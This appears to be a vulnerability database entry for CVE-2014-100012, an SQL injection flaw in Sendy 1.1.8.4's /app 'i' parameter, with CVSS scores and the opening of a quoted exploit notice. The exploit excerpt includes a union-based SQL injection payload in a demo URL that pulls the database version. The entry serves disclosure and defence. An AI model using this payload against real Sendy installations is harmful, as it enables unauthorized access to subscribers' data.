7.5
CVSSv2

CVE-2014-100012

Published: 13/01/2015 Updated: 14/01/2015
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in /app in Sendy 1.1.8.4 allows remote malicious users to execute arbitrary SQL commands via the i parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

sendy sendy 1.1.8.4

Exploits

# Exploit Title: Sendy SqlInject # Date: 2014-02-24 # Exploit Author: Hurley # Vendor Homepage: sendyco/ # Software Link: sendyco/ # Version: 1184 Demo page: server/app?i=1+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- ...